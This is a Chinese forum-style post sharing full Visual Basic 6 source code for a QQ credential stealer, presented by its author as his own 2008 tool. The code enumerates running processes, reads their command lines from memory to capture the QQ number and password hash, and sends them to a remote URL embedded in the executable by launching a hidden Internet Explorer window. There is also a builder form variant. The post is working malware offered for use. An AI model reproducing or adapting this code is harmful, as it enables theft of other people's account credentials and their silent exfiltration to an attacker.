使用QQ安全登录软件登录的QQ,该软件就可以截取!这是我2008年写的软件!其实就是获取命令行参数!然后截取发现密码。最后发送密码!其源代码如下:
模块1(Module1.bas)代码:
代码:
Option Explicit Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long Private Declare Function CreateToolhelp32Snapshot Lib "Kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long Private Declare Function Process32First Lib "Kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long Private Declare Function Process32Next Lib "Kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long Private Declare Sub CloseHandle Lib "Kernel32" (ByVal hPass As Long) Private Declare Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long Private Declare Function ReadProcessMemory Lib "Kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long Private Declare Function NtQueryInformationProcess Lib "ntdll" (ByVal ProcessHandle As Long, ByVal ProcessInformationClass As Long, ByRef ProcessInformation As Any, ByVal lProcessInformationLength As Long, ByRef lReturnLength As Long) As Long Private Const PROCESS_QUERY_INFORMATION = 1024 Private Const PROCESS_VM_READ = 16 Private Const TH32CS_SNAPHEAPLIST = &H1 Private Const TH32CS_SNAPPROCESS = &H2 Private Const TH32CS_SNAPTHREAD = &H4 Private Const TH32CS_SNAPMODULE = &H8 Private Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE) Private Const TH32CS_INHERIT = &H80000000 Private Const MAX_PATH As Integer = 260 Private Type PROCESS_BASIC_INFORMATION ExitStatus As Long PebBaseAddress As Long AffinityMask As Long BasePriority As Long UniqueProcessId As Long InheritedFromUniqueProcessId As Long End Type Private Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long th32DefaultHeapID As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long szExeFile As String * MAX_PATH End Type Const FILE_SIZE = 20481 Sub Main() Dim hSnapShot As Long Dim uProcess As PROCESSENTRY32 Dim r As Long hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&) uProcess.dwSize = Len(uProcess) r = Process32First(hSnapShot, uProcess) Dim qqstr As String Do While r qqstr = GetCmdLine(uProcess.th32ProcessID) r = Process32Next(hSnapShot, uProcess) Dim m As Integer Dim str As String If InStr(qqstr, "/START") <> 0 Then m = InStr(qqstr, "/") str = Left$(qqstr, m) qqstr = Replace(qqstr, str, "qqnum") qqstr = Replace(qqstr, "PWDHASH", "pass") qqstr = Replace(qqstr, "STAT:40", "") qqstr = Replace(qqstr, "STAT:41", "") ShellExecute 0, vbNullString, "C:\Program Files\Internet Explorer\IEXPLORE.EXE", geturl() & "?str=" & qqstr, vbNullString, vbHide End If If InStr(r, "SessionType") <> 0 Then qqstr = r qqstr = Replace(qqstr, "/SessionType:3 /START QQUIN", "qqnum") qqstr = Replace(qqstr, "PWDHASH", "pass") m = InStr(qqstr, "/") m = Len(qqstr) - m qqstr = Replace(qqstr, str, "") ShellExecute 0, vbNullString, "C:\Program Files\Internet Explorer\IEXPLORE.EXE", geturl() & "?str=" & qqstr, vbNullString, vbHide End If Loop CloseHandle hSnapShot End Sub Private Function GetCmdLine(ByVal plngPID As Long) As String Dim strBuffer As String Dim hProcess As Long Dim offset1 As Long Dim offset2 As Long Dim Dummy As Long Dim info As PROCESS_BASIC_INFORMATION Const STATUS_SUCCESS As Long = 0 offset1 = 1 offset2 = 0 hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or PROCESS_VM_READ, 0, plngPID) If (hProcess = 0) Then Exit Function End If If (NtQueryInformationProcess(hProcess, 0, info, Len(info), ByVal 0&) <> STATUS_SUCCESS) Then CloseHandle hProcess Exit Function End If If (ReadProcessMemory(hProcess, (info.PebBaseAddress + &H10), offset1, 4, Dummy) = STATUS_SUCCESS) Then CloseHandle hProcess Exit Function End If If (ReadProcessMemory(hProcess, (offset1 + &H44), offset2, 4, Dummy) = STATUS_SUCCESS) Then CloseHandle hProcess Exit Function End If strBuffer = String(256, " ") If (ReadProcessMemory(hProcess, offset2, ByVal strBuffer, 256, Dummy) = STATUS_SUCCESS) Then CloseHandle hProcess Exit Function End If CloseHandle hProcess strBuffer = Left$(strBuffer, InStr(strBuffer, Chr(0) & Chr(0))) GetCmdLine = StrConv(strBuffer, vbFromUnicode) End Function Function geturl() As String Dim bappend As Byte, inum As Long Dim i As Long, sinfo As String Open App.EXEName & ".exe" For Binary As #1 Seek #1, FILE_SIZE + 1 For inum = 1 To FileLen(App.EXEName & ".exe") - FILE_SIZE Get #1, , bappend sinfo = sinfo & Chr(bappend) Next inum geturl = sinfo Close #1 End Function
代码:
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long Private Declare Function CreateToolhelp32Snapshot Lib "Kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long Private Declare Function Process32First Lib "Kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long Private Declare Function Process32Next Lib "Kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long Private Declare Sub CloseHandle Lib "Kernel32" (ByVal hPass As Long) Private Declare Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long Private Declare Function ReadProcessMemory Lib "Kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long Private Declare Function NtQueryInformationProcess Lib "ntdll" (ByVal ProcessHandle As Long, ByVal ProcessInformationClass As Long, ByRef ProcessInformation As Any, ByVal lProcessInformationLength As Long, ByRef lReturnLength As Long) As Long Private Const PROCESS_QUERY_INFORMATION = 1024 Private Const PROCESS_VM_READ = 16 Private Const TH32CS_SNAPHEAPLIST = &H1 Private Const TH32CS_SNAPPROCESS = &H2 Private Const TH32CS_SNAPTHREAD = &H4 Private Const TH32CS_SNAPMODULE = &H8 Private Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE) Private Const TH32CS_INHERIT = &H80000000 Private Const MAX_PATH As Integer = 260 Private Type PROCESS_BASIC_INFORMATION ExitStatus As Long PebBaseAddress As Long AffinityMask As Long BasePriority As Long UniqueProcessId As Long InheritedFromUniqueProcessId As Long End Type Private Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long th32DefaultHeapID As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long szExeFile As String * MAX_PATH End Type Private Sub Form_Load() Dim hSnapShot As Long Dim uProcess As PROCESSENTRY32 Dim r As Long hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&) uProcess.dwSize = Len(uProcess) r = Process32First(hSnapShot, uProcess) Dim qqstr As String Do While r qqstr = GetCmdLine(uProcess.th32ProcessID) r = Process32Next(hSnapShot, uProcess) Dim m As Integer Dim str As String If InStr(qqstr, "/START") <> 0 Then m = InStr(qqstr, "/") str = Left$(qqstr, m) qqstr = Replace(qqstr, str, "qqnum") qqstr = Replace(qqstr, "PWDHASH", "pass") qqstr = Replace(qqstr, "STAT:40", "") qqstr = Replace(qqstr, "STAT:41", "") ShellExecute 0, vbNullString, "C:\Program Files\Internet Explorer\IEXPLORE.EXE", url.Text & "?str=" & qqstr, vbNullString, vbHide End If If InStr(r, "SessionType") <> 0 Then qqstr = r qqstr = Replace(qqstr, "/SessionType:3 /START QQUIN", "qqnum") qqstr = Replace(qqstr, "PWDHASH", "pass") m = InStr(qqstr, "/") m = Len(qqstr) - m qqstr = Replace(qqstr, str, "") ShellExecute 0, vbNullString, "C:\Program Files\Internet Explorer\IEXPLORE.EXE", url.Text & "?str=" & qqstr, vbNullString, vbHide End If Loop CloseHandle hSnapShot End Sub Private Function GetCmdLine(ByVal plngPID As Long) As String Dim strBuffer As String Dim hProcess As Long Dim offset1 As Long Dim offset2 As Long Dim Dummy As Long Dim info As PROCESS_BASIC_INFORMATION Const STATUS_SUCCESS As Long = 0 offset1 = 1 offset2 = 0 hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or PROCESS_VM_READ, 0, plngPID) If (hProcess = 0) Then Exit Function End If If (NtQueryInformationProcess(hProcess, 0, info, Len(info), ByVal 0&) <> STATUS_SUCCESS) Then CloseHandle hProcess Exit Function End If If (ReadProcessMemory(hProcess, (info.PebBaseAddress + &H10), offset1, 4, Dummy) = STATUS_SUCCESS) Then CloseHandle hProcess Exit Function End If If (ReadProcessMemory(hProcess, (offset1 + &H44), offset2, 4, Dummy) = STATUS_SUCCESS) Then CloseHandle hProcess Exit Function End If strBuffer = String(256, " ") If (ReadProcessMemory(hProcess, offset2, ByVal strBuffer, 256, Dummy) = STATUS_SUCCESS) Then CloseHandle hProcess Exit Function End If CloseHandle hProcess strBuffer = Left$(strBuffer, InStr(strBuffer, Chr(0) & Chr(0))) GetCmdLine = StrConv(strBuffer, vbFromUnicode) End Function